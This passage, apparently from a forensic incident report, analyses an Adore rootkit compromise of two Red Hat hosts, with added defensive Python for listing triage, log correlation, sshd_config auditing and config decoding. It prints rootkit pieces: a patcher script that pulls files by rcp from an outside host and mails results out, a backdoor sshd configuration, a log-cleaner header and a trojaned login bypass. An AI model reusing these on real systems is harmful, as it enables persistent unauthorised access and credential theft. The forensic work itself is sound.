    311861   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /bin/xlogin
     33432    4 drwx------   5 root/lp      4096 Dec  1 13:08 /lib/security/.config
     33433    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/backup
     33445   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /lib/security/.config/backup/login
     33447    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /lib/security/.config/backup/network
     33448   40 -rwx------   1 root/lp     37884 Nov 25 14:53 /lib/security/.config/backup/in.telnetd
     33434    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/bin
     33436   16 -rws------   1 root/lp     14184 Nov 25 14:53 /lib/security/.config/bin/su
     33437   24 -rws------   1 root/lp     20604 Nov 25 14:53 /lib/security/.config/bin/ping
     33438   28 -rwx------   1 root/lp     25116 Nov 25 14:53 /lib/security/.config/bin/du
     33439   16 -r-s------   1 root/lp     13536 Nov 25 14:53 /lib/security/.config/bin/passwd
     33440   80 -rwx------   1 root/lp     74236 Nov 25 14:53 /lib/security/.config/bin/find
     33441   44 -rwx------   1 root/lp     43740 Nov 25 14:53 /lib/security/.config/bin/ls
     33442   84 -rwx------   1 root/lp     78012 Nov 25 14:53 /lib/security/.config/bin/netstat
     33443   88 -rwx------   1 root/lp     83868 Nov 25 14:53 /lib/security/.config/bin/lsof
     33444   68 -r-x------   1 root/lp     65148 Nov 25 14:53 /lib/security/.config/bin/psr
     33435    4 -rw-------   1 root/lp       652 Nov 25 14:53 /lib/security/.config/uconf.inv
     33446  208 -rwx------   1 root/lp    205288 Nov 25 14:53 /lib/security/.config/sshd
    902260    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/ssh
    902274    4 -rw-------   1 root/lp       525 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key
    902276    4 -rw-------   1 root/lp       329 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key.pub
    902277    4 -rw-------   1 root/lp       512 Nov 28 16:57 /lib/security/.config/ssh/ssh_random_seed
    902278    4 -rw-------   1 root/lp       461 Nov 25 14:53 /lib/security/.config/ssh/sshd_config
     33449    8 -rwx------   1 root/lp      5064 Nov 25 14:53 /lib/security/.config/ava
     33450    4 -rwx------   1 root/lp      4032 Nov 25 14:53 /lib/security/.config/cleaner
     33451    4 -rwx------   1 root/lp      1596 Nov 25 14:53 /lib/security/.config/sz
     33452    4 -rwx------   1 root/lp       960 Nov 25 14:53 /lib/security/.config/patcher
     33453   12 -rwx------   1 root/lp     11970 Nov 25 14:53 /lib/security/.config/pg
     33454    4 -rwx------   1 root/lp      3648 Nov 25 14:53 /lib/security/.config/crypt
     33455    4 -rwx------   1 root/lp      3052 Nov 25 14:53 /lib/security/.config/utime
     33456    8 -rwx------   1 root/lp      7028 Nov 25 14:53 /lib/security/.config/lpsched
     33457   20 -rw-------   1 root/lp     19442 Nov 30 15:18 /lib/security/.config/mfs
    557659    8 -rwx------   1 root/lp      4276 Nov 25 14:53 /sbin/login
    689619  208 -rwxr-xr-x   1 root/lp    205288 Nov 25 14:53 /usr/bin/ssh2d
    770760   96 -rwx------   1 root/lp     93924 Nov 25 14:53 /usr/lib/lpq
    770761    8 -r--------   1 root/lp      5500 Nov 25 14:53 /usr/lib/crth.o

    It's now pretty clear where the rootkit is installed; (/lib/security/.config).
    I verified from the uncompromised system that there is no .config directory installed by default on Redhat.
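    The narrowing step just described (root/lp ownership plus the shared Nov 25 14:53 timestamp) is easy to make repeatable. Below is an added example, not code from the report, that parses 'find -ls' lines in the format printed above, applies those two criteria, and then asks which directory most of the hits cluster under. The listing lines are a subset copied from the report; the cluster heuristic (the common path prefix with the most hits) is a choice made here.

```python
"""Narrow a 'find / -group lp -ls' listing down to likely rootkit files.

Added example, not part of the original report. Applies the report's criteria:
owner root, group lp, and an mtime equal to the install timestamp.
"""
import os
from collections import Counter
from typing import Dict, List, Optional

MONTHS = {"Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"}

# A representative subset of the listing in the report (copied verbatim).
SAMPLE_LISTING = """\
47710210    0 dr-xr-xr-x   3 lp/lp             0 Dec  1 13:13 /proc/728
836755    4 -rw-r--r--   1 lp/lp               4 Nov 28 16:57 /var/run/lpd.printer
197622    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/lp0
202991    0 -rw-------   1 root/lp         0 Nov 25 14:53 /dev/dos
 16527    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /etc/rc.d/init.d/network
 33436   16 -rws------   1 root/lp     14184 Nov 25 14:53 /lib/security/.config/bin/su
 33446  208 -rwx------   1 root/lp    205288 Nov 25 14:53 /lib/security/.config/sshd
 33457   20 -rw-------   1 root/lp     19442 Nov 30 15:18 /lib/security/.config/mfs
557659    8 -rwx------   1 root/lp      4276 Nov 25 14:53 /sbin/login
688865  436 -rwxr-xr-x   1 lp/lp      439872 Aug 14 14:23 /usr/bin/lpr
689619  208 -rwxr-xr-x   1 root/lp    205288 Nov 25 14:53 /usr/bin/ssh2d
"""


def parse_find_ls_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one 'find -ls' line as printed in the report (owner/group joined by '/').

    Character devices print no size column, so the size is optional.
    """
    f = line.split()
    if len(f) < 9:
        return None
    inode, _blocks, perms, _nlink, owner_group = f[:5]
    owner, group = owner_group.split("/", 1)
    rest = f[5:]
    size = None
    if rest[0] not in MONTHS:            # regular file: a size precedes the month
        size = int(rest[0])
        rest = rest[1:]
    month, day, clock, path = rest[0], rest[1], rest[2], " ".join(rest[3:])
    return {"inode": int(inode), "perms": perms, "owner": owner, "group": group,
            "size": size, "mtime": f"{month} {int(day):2d} {clock}", "path": path,
            "setuid": perms[3] == "s"}


def parse_listing(text: str) -> List[Dict[str, object]]:
    return [e for e in (parse_find_ls_line(l) for l in text.splitlines()) if e]


def likely_rootkit_files(entries: List[Dict[str, object]], owner: str = "root",
                         group: str = "lp", install_stamp: str = "Nov 25 14:53"):
    """The report's criteria: root/lp ownership plus the shared install timestamp."""
    return [e for e in entries
            if e["owner"] == owner and e["group"] == group and e["mtime"] == install_stamp]


def rootkit_directory(hits: List[Dict[str, object]]) -> Optional[str]:
    """Path prefix shared by the most hits (ties broken toward the deeper prefix)."""
    if not hits:
        return None
    prefix_counts: Counter = Counter()
    for h in hits:
        d = os.path.dirname(str(h["path"]))
        while d and d != "/":
            prefix_counts[d] += 1
            d = os.path.dirname(d)
    best = max(prefix_counts.items(), key=lambda kv: (kv[1], len(kv[0])))
    return best[0]


if __name__ == "__main__":
    hits = likely_rootkit_files(parse_listing(SAMPLE_LISTING))
    for h in hits:
        print(("SUID " if h["setuid"] else "     ") + str(h["path"]))
    print("kit lives under:", rootkit_directory(hits))
```

    The timestamp filter alone would also catch the legitimate Aug 24 device nodes if it were dropped, which is the point the report makes: neither criterion is sufficient on its own, and the final word still comes from comparing each file against a known-clean host.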

    At this point in the investigation, it is easy to lose focus.  There is so much to look at!  However,  my priority is to determine the severity of this attack and if it has placed additional servers at risk.

    I know the ethernet card is in promiscuous mode (even though it is unplugged from the wall).
    I execute '/gooddir/ps' to get a list of currently running processes.

    ./lpsched is running.
    Using /gooddir/lsof -c lpsched, I discover that lpsched is using the file mfs.  I have now located the sniffer application (lpsched) and the sniffer's output file (mfs).

    I discover userids and passwords in the output file. To determine if this data has been retrieved, I return to my firewall logs and start analyzing.  I locate outgoing ICMP replies from victim #1 with no requests.  I searched my tcpdump files and discovered I had captured the outgoing packets! 

    I discovered the destination IP address was different from the attacking machine.  I searched my logs for this new IP and located identical packets from Victim#2. There was no other traffic recorded for this IP (Badguy IP#4).  I contacted the owner of this IP Address block and was informed that the subnet it was allocated to was a Dorm, however this particular address was not issued.

    I received a call from the owner of Victim#2.  I explained the situation and asked him to search his machine for the rootkit directory (/lib/security/.config). The directory was there.  Victim #2 has now been confirmed.

    To create a complete picture I continued analyzing the logs.
    First, I grep'ed all entries to/from Victim#1 on Nov 25th.  From that information, I extracted the connected IP address and grep'ed individually for each.  Excluding the Scanning IP address, I only found one additional IP Address listed amongst the IP's which had connected to Victim#1 (X.X.98.224). I searched the logs for this IP address and found nothing else.  I was unable to locate the machine with this address and it appeared to be offline during the time I was investigating.

    I repeated the same procedure above but with Victim#2.
    I merged all the extracted information into one file, sorted and uniq'ed it.  This gave me a fairly accurate log of the events.
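    The log correlation described in the last few paragraphs (pull every peer of each victim, drop the known scanner, check which peers appear with both victims or with nothing else, then merge, sort and uniq the events) is shown below as an added example; it is not code from the report. The report does not print its firewall log format, so the lines here are constructed in a generic "date time proto src:port -> dst:port" shape, the victims' anonymised X.X addresses are replaced by 10.10.x.x placeholders, and 192.0.2.77 is an unrelated placeholder visitor. The BadGuy addresses are the ones named in the report.

```python
"""Correlate firewall log lines for two hosts: shared peers, exclusive peers, merged timeline.

Added example, not part of the original report. Log lines are constructed.
"""
import re
from typing import Dict, Iterable, List, Set

VICTIM1 = "10.10.8.60"       # placeholder for the report's X.X.8.60
VICTIM2 = "10.10.167.56"     # placeholder for the report's X.X.167.56
SCANNER = "205.177.91.2"     # BadGuy IP#1 in the report, excluded as known noise

# Constructed sample log: scan to ftp, LPRng attack on 515, rcp pull from BadGuy#3,
# the campus telnet connection the report mentions, and one unrelated web visitor.
SAMPLE_LOG = """\
Nov 25 14:40:01 tcp 205.177.91.2:4123 -> 10.10.8.60:21
Nov 25 14:40:02 tcp 205.177.91.2:4124 -> 10.10.167.56:21
Nov 25 14:51:10 tcp 210.94.114.48:2001 -> 10.10.8.60:515
Nov 25 14:51:30 tcp 210.94.114.48:2002 -> 10.10.167.56:515
Nov 25 14:53:05 tcp 10.10.8.60:1025 -> 38.246.1.9:514
Nov 25 14:53:40 tcp 10.10.167.56:1026 -> 38.246.1.9:514
Nov 25 15:02:11 tcp 10.10.98.224:3301 -> 10.10.8.60:23
Nov 25 16:00:00 tcp 192.0.2.77:40000 -> 10.10.8.60:80
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_log(text: str) -> List[Dict[str, str]]:
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def peers_of(records: List[Dict[str, str]], host: str) -> Set[str]:
    """Every other address that shares a record with host (the grep per victim)."""
    peers: Set[str] = set()
    for r in records:
        if r["src"] == host:
            peers.add(r["dst"])
        elif r["dst"] == host:
            peers.add(r["src"])
    return peers


def shared_peers(records, hosts: Iterable[str], exclude: Iterable[str] = ()) -> Set[str]:
    """Addresses that talked to every host in hosts, minus known noise and the hosts themselves."""
    hosts = list(hosts)
    sets = [peers_of(records, h) for h in hosts]
    common = set.intersection(*sets) if sets else set()
    return common - set(exclude) - set(hosts)


def only_seen_with(records, host: str) -> Set[str]:
    """Peers of host that appear in no record not involving host: a lead, not proof."""
    peers = peers_of(records, host)
    elsewhere = {a for r in records if host not in (r["src"], r["dst"])
                 for a in (r["src"], r["dst"])}
    return peers - elsewhere


def timeline(records, hosts: Iterable[str]) -> List[str]:
    """Merged, de-duplicated, time-ordered events for the hosts (the sort | uniq step)."""
    hosts = set(hosts)
    seen: Set[str] = set()
    out: List[str] = []
    for r in records:
        if r["src"] in hosts or r["dst"] in hosts:
            line = f"{r['ts']} {r['proto']} {r['src']}:{r['sport']} -> {r['dst']}:{r['dport']}"
            if line not in seen:
                seen.add(line)
                out.append(line)
    # a plain string sort is correct here because every line shares the same month and day
    return sorted(out)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("shared peers:", sorted(shared_peers(recs, [VICTIM1, VICTIM2], exclude=[SCANNER])))
    print("only with victim1:", sorted(only_seen_with(recs, VICTIM1)))
    print("\n".join(timeline(recs, [VICTIM1, VICTIM2])))
```

    With these constructed lines, the shared-peer set comes out as the exploit source and the rcp host, and the addresses seen only with Victim#1 include both the campus telnet source and the harmless web visitor, which is why the report follows that lead with a phone call rather than a conclusion.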

    I returned to Victim#1 and archived the rootkit directory.  I created a directory structure off of /gooddir and mv'd the trojaned files to the corresponding directory.  I used mv to prevent the filestats from changing.  Then I cp'd the /gooddir/<goodfiles> to the correct location. 

    I began analyzing each file in the  rootkit directory.  I was fortunate to have the uncompromised Redhat box in the next office.  This allowed me to quickly determine if the file was compromised. 

    A few days into the analysis process it became clear the machine would require a full reinstall of the operating system. 
    After both machines were reformatted and PATCHED, I began searching the internet to determine what rootkit had been used.
     

    Rootkit Directory
    The rootkit is installed in a newly created directory named /lib/security/.config .

    drwx------ root/lp           0 2000-11-25 14:46:14 ./.config/
    drwx------ root/lp           0 2000-11-25 14:46:07 ./.config/backup/
    -rwx------ root/lp       19464 2000-11-25 14:46:06 ./.config/backup/login
    -rwx------ root/lp        5228 2000-11-25 14:46:07 ./.config/backup/network
    -rwx------ root/lp       37884 2000-11-25 14:46:07 ./.config/backup/in.telnetd
    drwx------ root/lp           0 2000-11-25 14:46:06 ./.config/bin/
    -rws------ root/lp       14184 2000-11-25 14:46:06 ./.config/bin/su
    -rws------ root/lp       20604 2000-11-25 14:46:06 ./.config/bin/ping
    -rwx------ root/lp       25116 2000-11-25 14:46:06 ./.config/bin/du
    -r-s------ root/lp       13536 2000-11-25 14:46:06 ./.config/bin/passwd
    -rwx------ root/lp       74236 2000-11-25 14:46:06 ./.config/bin/find
    -rwx------ root/lp       43740 2000-11-25 14:46:06 ./.config/bin/ls
    -rwx------ root/lp       78012 2000-11-25 14:46:06 ./.config/bin/netstat
    -rwx------ root/lp       83868 2000-11-25 14:46:06 ./.config/bin/lsof
    -r-x------ root/lp       65148 2000-11-25 14:46:06 ./.config/bin/psr
    -rw------- root/lp         652 2000-11-25 14:46:06 ./.config/uconf.inv
    -rwx------ root/lp      205288 2000-11-25 14:46:07 ./.config/sshd
    drwx------ root/lp           0 2000-11-25 14:46:07 ./.config/ssh/
    -rw------- root/lp         525 2000-11-25 14:46:07 ./.config/ssh/ssh_host_key
    -rw------- root/lp         329 2000-11-25 14:46:07 ./.config/ssh/ssh_host_key.pub
    -rw------- root/lp         512 2000-11-29 18:46:12 ./.config/ssh/ssh_random_seed
    -rw------- root/lp         461 2000-11-25 14:46:07 ./.config/ssh/sshd_config
    -rwx------ root/lp        5064 2000-11-25 14:46:14 ./.config/ava
    -rwx------ root/lp        4032 2000-11-25 14:46:14 ./.config/cleaner
    -rwx------ root/lp        1596 2000-11-25 14:46:14 ./.config/sz
    -rwx------ root/lp         960 2000-11-25 14:46:14 ./.config/patcher
    -rwx------ root/lp       11970 2000-11-25 14:46:14 ./.config/pg
    -rwx------ root/lp        3648 2000-11-25 14:46:14 ./.config/crypt
    -rwx------ root/lp        3052 2000-11-25 14:46:14 ./.config/utime
    -rwx------ root/lp        7028 2000-11-25 14:46:14 ./.config/lpsched
    -rw------- root/lp       47238 2000-11-29 18:45:10 ./.config/mfs

    The files in /lib/security/.config/bin are the original (good) Linux commands.
    The files in /lib/security/.config/backup are backups of the trojaned files.
    The files in /lib/security/.config/ssh are the configuration files used by the ssh backdoor.
    • ssh_host_key
      <strings ssh_host_key>
      SSH PRIVATE KEY FILE FORMAT 1.1
      %zrc
      root@NoraD
      4wh#
      /FpBF`
      /-!V
      <End of ssh_host_key>
       
    • ssh_host_key.pub
      024 41 104815528740090300232762682062148731692345617648761
      8848931447497024381787165076021063844673484423325557262722
      2990509006086551815209422016634885187452282711766925606918
      0699567468232805547620203421525417575684002027686936703327
      5595088918404285780009035980854568513549270233145248547086
      53799840391129004567592229 root@NoraD
       
    • sshd_config
      # This is ssh server systemwide configuration file.

      Port 15000
      ListenAddress 0.0.0.0
      ServerKeyBits 768
      LoginGraceTime 600
      KeyRegenerationInterval 3600
      PermitRootLogin yes
      IgnoreRhosts no
      StrictModes yes
      QuietMode no
      X11Forwarding yes
      X11DisplayOffset 10
      FascistLogging no
      PrintMotd yes
      KeepAlive yes
      SyslogFacility DAEMON
      RhostsAuthentication no
      RhostsRSAAuthentication yes
      RSAAuthentication yes
      PasswordAuthentication yes
      PermitEmptyPasswords yes
      UseLogin no
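    A configuration like the one above is recognisable on sight, but the same checks are worth running against any sshd_config found on a suspect host, including the real one in /etc/ssh. The example below is added here and is not from the report or the rootkit: it parses the directives printed above, compares them against a small baseline of expected values (the baseline itself is an assumption made for this example), and separately flags a config file living outside /etc/ssh.

```python
"""Audit an sshd_config for settings typical of a backdoor or badly hardened listener.

Added example, not from the report or the rootkit. The BASELINE table is an
assumed set of expectations, not a vendor default.
"""
from typing import Dict, Iterable, List, Tuple

# Copied from the rootkit's sshd_config as printed in the report.
PAGE_SSHD_CONFIG = """\
# This is ssh server systemwide configuration file.

Port 15000
ListenAddress 0.0.0.0
ServerKeyBits 768
LoginGraceTime 600
KeyRegenerationInterval 3600
PermitRootLogin yes
IgnoreRhosts no
StrictModes yes
QuietMode no
X11Forwarding yes
X11DisplayOffset 10
FascistLogging no
PrintMotd yes
KeepAlive yes
SyslogFacility DAEMON
RhostsAuthentication no
RhostsRSAAuthentication yes
RSAAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords yes
UseLogin no
"""

# (directive, expected value, what a deviation means). Assumed baseline for this example.
BASELINE = [
    ("port", "22", "listener on a non-standard port"),
    ("permitrootlogin", "no", "direct root login allowed"),
    ("permitemptypasswords", "no", "accounts with empty passwords accepted"),
    ("ignorerhosts", "yes", "~/.rhosts trust honoured"),
    ("rhostsrsaauthentication", "no", "host-based trust enabled"),
]


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Keyword/value pairs with keywords lower-cased.

    sshd honours the first occurrence of a keyword, so later duplicates are ignored;
    blank lines and comments are skipped.
    """
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        conf.setdefault(parts[0].lower(), parts[1].strip())
    return conf


def audit_sshd_config(text: str, expected_port: str = "22") -> List[Tuple[str, str, str]]:
    """Return (directive, observed value, finding) for every deviation from BASELINE."""
    conf = parse_sshd_config(text)
    findings = []
    for key, expected, why in BASELINE:
        want = expected_port if key == "port" else expected
        observed = conf.get(key, "<unset>")
        if observed.lower() != want.lower():
            findings.append((key, observed, why))
    return findings


def unexpected_location(path: str, allowed: Iterable[str] = ("/etc/ssh/",)) -> bool:
    """True when an sshd_config lives somewhere a packaged sshd would never read it."""
    return not any(path.startswith(prefix) for prefix in allowed)


if __name__ == "__main__":
    path = "/lib/security/.config/ssh/sshd_config"
    if unexpected_location(path):
        print(f"{path}: sshd_config outside /etc/ssh")
    for key, observed, why in audit_sshd_config(PAGE_SSHD_CONFIG):
        print(f"{key} = {observed}: {why}")
```

    Against the rootkit's file every baseline entry fires, and the file's location fires as well; against a sane /etc/ssh/sshd_config the audit returns an empty list, which makes it usable as a routine check rather than only as a post-mortem tool.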
       
    The other files in the rootkit directory do the following:

    uconf.inv - I believe this file is where Adore keeps the list of items to be hidden. The file is referenced by ls, ps, netstat. The strings command produces no data however the file is DATA (but not ascii) and it contains 652 characters (wc -c). Below is the hexdump.  There was only one line difference between the hexdump from Victim#1 and Victim#2's file.
    The line on Victim#2 that is different: 

    Victim 2 - 0000280 8c8c 91c2 8991 c795 9395 f591 
    ---
    Victim 1 - 0000280 8c8c 8dc2 99c9 cdcf 878b f591 

    <Start of uconf.inv hexdump from Victim#1>
    0000000 99a4 9396 a29a 99f5 9196 c29b 93d0 9d96
    0000010 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190 9699
    0000020 d098 969d d091 9699 9b91 9bf5 c28a 93d0
    0000030 9d96 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190
    0000040 9699 d098 969d d091 8a9b 93f5 c28c 93d0
    0000050 9d96 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190
    0000060 9699 d098 969d d091 8c93 99f5 9396 a09a
    0000070 9699 8b93 8d9a c28c 9c8a 9190 d199 9196
    0000080 d389 9c8b d18f 9093 d398 9387 9890 9196
    0000090 d1d3 909c 9991 9896 d1d3 909c 9991 9896
    00000a0 8cd3 978c 9bcd f5f5 8fa4 a28c 8ff5 c28c
    00000b0 93d0 9d96 8cd0 9c9a 8d8a 8b96 d086 9cd1
    00000c0 9190 9699 d098 969d d091 8c8f f58d 8c8f
    00000d0 99a0 9396 9a8b 8c8d 93c2 8e8f 93d3 8c8f
    00000e0 979c 9b9a 8cd3 ce97 d38b 8c8f d38d 8c8c
    00000f0 cd97 d39b 8f93 9a8c d38b 8f93 9c8c 9a97
    0000100 d39b 9387 9890 9196 d0d3 9693 d09d 9a8c
    0000110 f59c 8c93 9990 99a0 9396 9a8b 8c8d d0c2
    0000120 9693 d09d 9a8c 8a9c 968d 868b d1d0 909c
    0000130 9991 9896 8ad3 909c 9991 96d1 8991 8fd3
    0000140 918c 9996 d399 8c8f d38d cec5 cfcc cfcf
    0000150 c5d3 cacd cfcf d3cf 9bd0 899a 8fd0 8c8b
    0000160 cfd0 d3ce 918c 93d1 8fd3 908d d392 8c93
    0000170 9990 8bd3 8f9c 93d1 9890 8cd3 978c 9bcd
    0000180 93d3 8c8f 979c 9b9a 87d3 9093 9698 d391
    0000190 9cd1 9190 9699 f598 a4f5 9a91 8c8b 9e8b
    00001a0 a28b 91f5 8b9a 8b8c 8b9e d0c2 9693 d09d
    00001b0 9a8c 8a9c 968d 868b d1d0 909c 9991 9896
    00001c0 9dd0 9196 91d0 8b9a 8b8c 8b9e 91f5 8b9a
    00001d0 99a0 9396 9a8b 8c8d cec2 cfcc cfcf cdd3
    00001e0 cfca cfcf c9d3 c9c9 d3c8 cfc7 cfcf c6d3
    00001f0 cfcf f5cf a4f5 9093 9698 a291 8cf5 a08a
    0000200 9093 c29c 93d0 9d96 8cd0 9c9a 8d8a 8b96
    0000210 d086 9cd1 9190 9699 d098 969d d091 8a8c
    0000220 8ff5 9196 c298 93d0 9d96 8cd0 9c9a 8d8a
    0000230 8b96 d086 9cd1 9190 9699 d098 969d d091
    0000240 968f 9891 8ff5 8c9e 888c c29b 93d0 9d96
    0000250 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190 9699
    0000260 d098 969d d091 9e8f 8c8c 9b88 8cf5 9a97
    0000270 9393 d0c2 969d d091 978c 8cf5 a08a 9e8f
    0000280 8c8c 8dc2 99c9 cdcf 878b f591 
    000028c
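
    The dump above is readable once every byte is XORed with 0xFF: the first bytes decode to "[file]" followed by "find=/lib/security/.config/bin/find", the same section and key names that appear in the strings of the trojaned ls further down. The following decoder is an added example (mine, not from the report or the rootkit); it assumes the dump is `od -x` output from an i386 host, so each four-digit word is a little-endian 16-bit value whose bytes must be swapped, and that the offsets are hexadecimal (as the `00000a0` and `000028c` lines show).

```python
import re

# Matches one `od -x` line: a 7-digit hex offset followed by zero or more
# 4-digit words. The final line of a dump carries only the total byte count.
OD_LINE = re.compile(r"^\s*([0-9a-f]{7})((?:\s+[0-9a-f]{4})*)\s*$")


def od_x_to_bytes(dump: str) -> bytes:
    """Rebuild the file bytes from `od -x` text (assumption: little-endian host)."""
    out = bytearray()
    for line in dump.splitlines():
        m = OD_LINE.match(line)
        if not m:
            continue  # skip delimiters, blank lines and the "Victim N -" labels
        offset = int(m.group(1), 16)
        if offset != len(out):
            # Also catches a wrong total on the trailing offset-only line.
            raise ValueError(f"dump is not contiguous at offset {offset:#x}")
        for word in m.group(2).split():
            value = int(word, 16)
            out.append(value & 0xFF)  # low byte was first in the file
            out.append(value >> 8)
    return bytes(out)


def invert(data: bytes) -> bytes:
    """uconf.inv stores its configuration with every byte XORed with 0xFF."""
    return bytes(b ^ 0xFF for b in data)


def decode_uconf(dump: str) -> str:
    return invert(od_x_to_bytes(dump)).decode("ascii", errors="replace")


def parse_config(text: str) -> dict:
    """Split decoded text into {section: {key: value}}; the sections are the
    [file]/[ps]/[netstat]/[login] names seen in the trojaned ls strings."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


# The first five lines of the Victim#1 dump, copied from the report above.
SAMPLE = """\
0000000 99a4 9396 a29a 99f5 9196 c29b 93d0 9d96
0000010 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190 9699
0000020 d098 969d d091 9699 9b91 9bf5 c28a 93d0
0000030 9d96 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190
0000040 9699 d098 969d d091 8a9b 93f5 c28c 93d0
"""

if __name__ == "__main__":
    print(decode_uconf(SAMPLE))
    print(parse_config(decode_uconf(SAMPLE)))
```

Fed the complete dump, the same functions decode the whole file, and the trailing `000028c` line is checked against the number of bytes recovered.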

    ava - This is actually Adore (ava is its userspace control program). The object module used by this program is normally named adore.o; here it has been renamed /usr/lib/crth.o.

    Here is the description that is posted on Packetstorm:
    Adore is a linux LKM based rootkit. Features smart PROMISC flag hiding, persistent file and directory hiding (still hidden after
    reboot), process-hiding, netstat hiding, rootshell-backdoor, and an uninstall routine. Includes a userspace program to control
    everything. Changes: Improved promisc hiding, port hiding fixed, and a readme

    cleaner - A shell script to clean up logfiles.

    #!/bin/sh
    #
    #       Generic log cleaner v0.4 By: Tragedy/Dor (dor@kaapeli.net)
    #               Based on sauber..
    #
    #  This is TOTALLY incomplete... I never added support for IRIX or SunOS...
    #  And.. i most likely never will.. And i take no responsibility for any use/misuse
    #  of this tool..
    #
    # Notes-0.3
    #   SunOS support added.. had to rewrite most of it :P
    # Notes-0.4
    #   Beta IRIX support added and enabled...
     

    sz - A file resize application, also by Dor

    #!/bin/sh
    # File resizer v2.4 (C) 1999-2000 Tragedy/Dor (dor@fortknox.org)
    # Purpose: Adds zeroes to a file to match it`s size to another file.
    # Disclaimer: The author takes no responsibility for any use, misuse
    # or bugs in this program.

    patcher - A patching engine for the RedHat Rootkit

    < patcher begin>
    #!/bin/sh
    # Patching engine for RedHat Rootkit

    REDHAT=`cat /etc/redhat-release | awk '{print $5}'`
    DUMPSITE="adm@38.246.1.9:/var/adm/"

    upd()
    {
    printf "Installing $1"
    rcp ${DUMPSITE}${1} ./
    ls -lga $1 >>patcher.log
    rpm -Uvh $1 >>patcher.log
    }
            case $REDHAT in
                    6.0)
                    upd am-utils-6.0.1s11-1.6.0.i386.rpm
                    upd bind-8.2.2_P3-1.i386.rpm
                    upd vixie-cron-3.0.1-38.i386.rpm
                    upd nfs-utils-0.1.9.1-1.i386.rpm
                            ;;
                    6.1)
                    upd bind-8.2.2_P3-1.i386.rpm
                    upd gdm-2.0beta2-26.i386.rpm
                    upd nfs-utils-0.1.9.1-1.i386.rpm
                            ;;
                    6.2)
                    upd gdm-2.0beta2-26.i386.rpm
                    upd nfs-utils-0.1.9.1-1.i386.rpm
                            ;;
                    7.0)
                            ;;
                    *)
                           # prolly something lame like 6.2kr
                            exit
                            ;;
                    esac

    cat patcher.log | mail -s `hostname -f` tcl_co@mailroom.com
    < End of patcher>

    pg - A binary file.  I believe it is used to encrypt a password (which was found in /etc/ld.so.hash)
     

    <Strings output of pg>
    /lib/ld-linux.so.2
    __gmon_start__
    libcrypt.so.1
    crypt
    libc.so.6
    printf
    __deregister_frame_info
    _IO_stdin_used
    __libc_start_main
    __register_frame_info
    GLIBC_2.0
    PTRh
    QVhP
    Usage %s <password>
    <End of pg>


    crypt - A binary file.  I believe this command is used to encrypt the transmission of the captured sniffer data.
     

    <Strings output of crypt>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    printf
    fprintf
    __deregister_frame_info
    _IO_getc
    fclose
    stderr
    fputc
    fopen
    _IO_stdin_used
    __libc_start_main
    __register_frame_info
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    QVh 
    Cannot open input file: "%s".
    File processed...
    <End of  crypt>


    utime - Binary file that prints the current time in seconds since the Epoch.
    lpsched - Binary file.  This is the sniffer application.
     

    <Strings from lpsched>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    ioctl
    perror
    dup2
    malloc
    gethostbyaddr
    socket
    fflush
    alarm
    fprintf
    ctime
    __deregister_frame_info
    signal
    read
    strncpy
    fork
    inet_ntoa
    time
    isprint
    sprintf
    fclose
    stderr
    exit
    fopen
    _IO_stdin_used
    __libc_start_main
    open
    toupper
    setsid
    __register_frame_info
    close
    free
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    urf;{
    hWVS
    8-uLF
    ============================================================
    Time: %s     Size: %d
    Path: %s
     => %s [%d]
    ------------------------------------------------------------
    Exiting...
    cant get SOCK_PACKET socket
    cant get flags
    cant set promiscuous mode
    eth0
    /dev/null
    cant open log
    <End of lpsched>


    mfs - This is the sniffer capture file.



    Files located outside of the Rootkit home directory:


    /bin/login - The original login command is renamed xlogin. When a user logs in, the trojaned login executes first. This command reads the file /etc/ld.so.hash, which contains an encrypted password, then prompts the user for their username and password. My theory is that once the username and password have been obtained, an attempt to authenticate the user against the ld.so.hash password is made. If this fails, the original login command (now xlogin) is executed. If the password matches the password in ld.so.hash, /bin/sh is executed.
     

    <Strings output of login>
    /lib/ld-linux.so.2
    __gmon_start__
    libcrypt.so.1
    crypt
    libc.so.6
    strcpy
    printf
    getenv
    execve
    fgets
    getpass
    system
    __deregister_frame_info
    stdin
    sscanf
    strcmp
    exit
    fopen
    _IO_stdin_used
    __libc_start_main
    __register_frame_info
    GLIBC_2.0
    GLIBC_2.1
    PTRh\
    WVSh
    DISPLAY
    /etc/ld.so.hash
    /bin/xlogin
    login: 
    Password:
